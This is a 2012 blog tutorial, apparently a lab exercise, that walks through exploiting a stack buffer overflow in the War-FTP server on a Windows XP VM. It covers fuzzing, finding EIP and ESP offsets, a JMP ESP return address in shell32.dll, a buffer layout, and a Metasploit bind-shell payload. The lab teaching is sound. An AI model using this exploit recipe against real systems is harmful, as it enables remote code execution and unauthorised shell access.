Wednesday, October 17, 2012

Buffer overflow: War-FTP

Ok, now we try to learn about buffer overflow.
A buffer overflow is something that should not normally happen: the data written to a buffer exceeds the capacity of the memory reserved for it, so the extra bytes spill over into neighbouring memory. That is the vulnerability that lets crafted input take over the program. Follow step by step.

1. Run your Windows XP in VirtualBox or VMware
2. Run War-FTP

3. Open a console and type
#nc ip port
This checks that the server is running.

4. The next step is to make a fuzzer. The fuzzer is a Python app that sends abnormal data to the server so it errors out. Here we write fuzz.py using nano.
5. Run the command to execute the fuzzer
#python fuzz.py
The fuzzer succeeds and War-FTP disappears from the screen (it crashed).
6. Now we use a debugger to look at what happens to the data.
For the debugger we use OllyDbg. Run OllyDbg and open War-FTP through OllyDbg.
If War-FTP cannot run, make a new user in War-FTP: select user security properties > add.
After the user is made, run War-FTP again and look at the registers in OllyDbg.



7. Next we develop the vulnerability using pattern_create.
#cd /opt/metasploit/msf3/tools
#./pattern_create.rb 1000 > data.txt
Open data.txt in a text editor and look at the data.
8. Next put the data from data.txt into the fuzzer we made.

Run War-FTP again through OllyDbg and run the fuzzer. Look at the registers in OllyDbg.
9. After the app has crashed, next we find which bytes of the string landed in the registers.
For this step we use the tool pattern_offset from the console.
#./pattern_offset.rb 32714131
#./pattern_offset.rb q4Aq5Aq

To reach the EIP register we need 485 bytes of data, and to reach the stack we need 493 bytes.
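As an added example (not code from the original post), here is a small Python reimplementation of what pattern_create.rb and pattern_offset.rb do in step 9, so you can see where 485 and 493 come from: the pattern is a run of unique upper/lower/digit triples, and the EIP value 32714131 is first decoded as the little-endian bytes "1Aq2" before being searched for. It assumes the same 1000-byte pattern the post uses.

```python
import struct
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits

HEX_DIGITS = set("0123456789abcdefABCDEF")


def pattern_create(length):
    """Build the cyclic pattern that pattern_create.rb produces: 3-byte
    triples <upper><lower><digit> with the digit cycling fastest
    (Aa0Aa1...Aa9Ab0...), so every 4-byte window is unique for 20280 bytes."""
    triples = []
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        triples.append(upper + lower + digit)
        if len(triples) * 3 >= length:
            break
    return "".join(triples)[:length]


def pattern_offset(value, length=1000):
    """Return the offset of `value` in the pattern, or None if it is absent.

    `value` is either a literal fragment read from the stack ("q4Aq5Aq") or
    an 8-hex-digit register value ("32714131"); the latter is unpacked as a
    little-endian 32-bit word, so 0x32714131 becomes the bytes "1Aq2".
    """
    pattern = pattern_create(length)
    if len(value) == 8 and set(value) <= HEX_DIGITS:
        needle = struct.pack("<I", int(value, 16)).decode("latin-1")
    else:
        needle = value
    index = pattern.find(needle)
    return index if index >= 0 else None


if __name__ == "__main__":
    # The two values the post reads out of OllyDbg after the 1000-byte crash.
    print("EIP 32714131 ->", pattern_offset("32714131"))  # 485
    print("ESP q4Aq5Aq  ->", pattern_offset("q4Aq5Aq"))   # 493
```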

10. Next, to see EIP being overwritten, edit the fuzzer.
Add:
nilaiEIP = "\x90" * 485
nilaiEIP += "\xEF\xBE\xAD\xDE"

between import socket and s.connect.
11. Run War-FTP through OllyDbg and run the fuzzer again.
Look at the result: the register has changed.
After EIP, next is ESP. The step is the same, just edit the fuzzer.
Add:
buffer = "\x90" * 485
buffer += "\xEF\xBE\xAD\xDE"
buffer += "\x90" * (493-len(buffer))
buffer += "\xCC" * (1000-len(buffer))
between import socket and s.connect.


12. Next look at the register window and the stack.
All the data is \xCC.



13. Now you control the stack; the next step is how to execute the payload.
In OllyDbg, select View > Executable modules.
The modules window lists the libraries loaded by War-FTP. Select a library in which to find the jump instruction that EIP will point to; here I used shell32.dll.
Next we search for the instruction JMP ESP in that file: right-click on the main window -> Search for -> Command.



14. After searching for JMP ESP and finding it, we must note its address. In this case the address is 7CA58265.
Next edit line 5 of the fuzzer:
buffer += "\x65\x82\xA5\x7C"
Then run War-FTP through OllyDbg and run the fuzzer again.

Here the value of the EIP register is 00A5FD59, no longer 7CA58265.

15. Now continue the debugging with a breakpoint, the same way as in malware analysis.


16. Now make the payload to put into the buffer.
#cd /pentest/exploit/framework2
#./msfweb
Open a browser and go to 127.0.0.1:55555.

Next click Payloads > os::win32 in the module filter > Windows bind shell.
Click Generate.
17. Copy the generated code into the fuzzer.

Run War-FTP without OllyDbg and run the fuzzer.
Final step: #telnet ip port


FINISH :) <THANKS GOD>
